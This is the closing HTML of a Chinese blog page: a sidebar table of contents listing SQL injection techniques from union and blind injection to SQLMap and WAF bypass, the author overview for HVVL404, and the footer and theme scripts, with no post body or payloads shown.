        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E3%80%81SQL-%E8%81%94%E5%90%88%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">一、SQL 联合注入</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1%E3%80%81%E6%95%B0%E5%AD%97%E5%9E%8B"><span class="nav-number">1.1.</span> <span class="nav-text">1、数字型</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2%E3%80%81%E5%AD%97%E7%AC%A6%E5%9E%8B"><span class="nav-number">1.2.</span> <span class="nav-text">2、字符型</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">2.</span> <span class="nav-text">二、报错注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E7%9B%B2%E6%B3%A8"><span class="nav-number">3.</span> <span class="nav-text">三、盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#1%E3%80%81%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8"><span class="nav-number">3.1.</span> <span class="nav-text">1、布尔盲注</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#2%E3%80%81%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="nav-number">3.2.</span> <span class="nav-text">2、时间盲注</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E6%9B%B4%E6%96%B0%E6%B3%A8%E5%85%A5"><span class="nav-number">4.</span> <span class="nav-text">四、更新注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BA%94%E3%80%81%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-number">5.</span> <span class="nav-text">五、堆叠注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%AD%E3%80%81%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="nav-number">6.</span> <span class="nav-text">六、二次注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%83%E3%80%81%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="nav-number">7.</span> <span class="nav-text">七、宽字节注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%85%AB%E3%80%81URL-%E5%8F%8C%E8%A7%A3%E7%A0%81%E6%B3%A8%E5%85%A5"><span class="nav-number">8.</span> <span class="nav-text">八、URL 双解码注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B9%9D%E3%80%81HTTP-%E5%A4%B4%E6%B3%A8%E5%85%A5"><span class="nav-number">9.</span> <span class="nav-text">九、HTTP 头注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8D%81%E3%80%81SQLMap-%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="nav-number">10.</span> <span class="nav-text">十、SQLMap 的使用</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8D%81%E4%B8%80%E3%80%81%E7%BB%95-WAF"><span class="nav-number">11.</span> <span class="nav-text">十一、绕 WAF</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="HVVL404"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">HVVL404</p>
  <div class="site-description" itemprop="description">欢迎来到我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">44</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/HVVL404" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;HVVL404" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2023-04 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">HVVL404</span>
</div>

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共76.1k字</span>
</div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
